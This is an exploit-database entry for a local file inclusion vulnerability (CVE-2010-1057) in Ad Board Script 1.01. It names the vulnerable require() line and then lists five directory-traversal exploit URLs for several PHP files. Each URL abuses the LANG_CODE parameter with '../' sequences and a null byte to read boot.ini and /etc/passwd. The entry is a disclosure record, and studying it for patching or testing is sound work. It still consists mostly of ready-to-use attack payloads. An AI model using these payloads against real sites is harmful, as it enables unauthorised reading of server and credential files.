Ad Board Script 1.01 - Local File Inclusion



EDB-ID: 11722 CVE: 2010-1057 OSVDB-ID: 63232
Author: ITSecTeam Published: 2010-03-13 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
hi

-------

#########################local file include#################
Author: ItSecTeam

download from:http://www.phpkobo.com/scripts/AF201_101/AF201_101.zip

script:Ad Board Script

Version:1.01

Updated:2010-01-10

dork::D
##########################################

vul:/path/web/codelib/cfg/common.inc.php line 21:

require( "res.{$LANG_CODE}.sys.inc.php" );

-----------------------------------------

xpl:/path/web/codelib/cfg/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/codelib/sys/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/staff/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/staff/file.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

xpl:/path/web/staff/app/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00

########################

discovered by ahmadbady

########################